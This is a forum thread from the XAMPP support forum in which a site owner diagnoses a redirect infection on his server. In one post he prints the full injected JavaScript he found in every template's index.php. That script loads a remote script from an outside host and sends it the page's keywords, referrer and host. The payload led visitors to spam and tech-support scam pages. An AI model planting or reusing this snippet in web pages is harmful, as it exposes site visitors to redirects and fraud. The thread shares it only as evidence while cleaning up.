Apache Friends Support Forum

[brduran]

I've been running my XAMPP server on Windows 7 for years now and just noticed today a redirection:

1. I've done the following in Google, Bing, and Yahoo in more than 10 computers at different locations using IE11, Chrome, Firefox with very similar results
Search query results for "teknician" and "banaguises" have a high chance of redirecting to "http://redirect.xmlheads.com/index.php" when you click on them
2. Both sites www.teknician.com and www.banaguises.com are on the same XAMPP server
3. Internal links on the websites like "http://www.teknician.com/index.php/remote" have a chance of redirecting as well
4. All I can think of is where to start looking for the infection?

Any help is greatly appreciated. Thank you!

[Nobbie]

From readme_en.txt

A matter of security (A MUST READ!)

As mentioned before, XAMPP is not meant for production use but only for developers in a development environment. The way XAMPP is configured is to be open as possible and allowing the developer anything he/she wants. For development environments this is great but in a production environment it could be fatal.

[brduran]

The XAMPP server has been working great for more than 10 years. It's on a Windows 7 computer with RAID1 Solid States Drives and I'm only running Apache and MySQL but not as service. For email I'm not using Mercury which came with it but hMailServer.

The server was connected directly to the modem for a decade until a couple of years ago my ISP warned me it had been used for spam. After closing all holes I moved the server behind a SonicWall TZ200, party is over. This redirect infection must've been there for very long time as I sincerely doubt any yoyo can get passed a SonicWall.

At first I thought it was the Apache Server that had been compromised but when my head cooled off it came down to two options: ".htaccess" or "index.php"

The second was right, every single template in every single website on the server had the script below inserted <head> between </head> portion of the "index.php". That scrypt would bring up the URL http://redirect.xmlheads.com/index.php on the webbrowser which in turn would redirect to poorly and crapy designed websites some of of which would scare you saying your computer was infected and to call certain number in USA... well not anymore.

------------
<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://ds-expertin.de/js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('http://ds-expertin.de/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>
------------

[Nobbie]

The XAMPP server has been working great for more than 10 years.

That does not change anything, it simply depends on your personal luck.

The second was right, every single template in every single website on the server had the script below inserted <head> between </head> portion of the "index.php".

Due to the fact, that your Xampp Server is not protected properly.

[metro82]

i'll probably be of zero help here ... but i'm just wondering do you at the very least have a back-up of whatever was infected? (templates, etc...)?

this solution isn't for everyone ... but i always like to say "when in doubt" just do a complete reformat of your machine to be 100% sure that whatever got on your machine will be gone

probably would be very tedious and time consuming though as you'd need to reinstall everything from scratch again, and upload your server files & databases, etc...

but at the very least you can be assured that your system is 100% clean

try to have your machine properly protected if you do go for the reformat route ... because the issue you're having now would likely reappear again i'd assume ... and a reformat would do nothing

since this is not a xampp issue, i don't think you'll find much luck finding an answer to your issues

good luck nevertheless ... sorry i couldn't be more of help but was hoping to hear you at least had back-ups of everything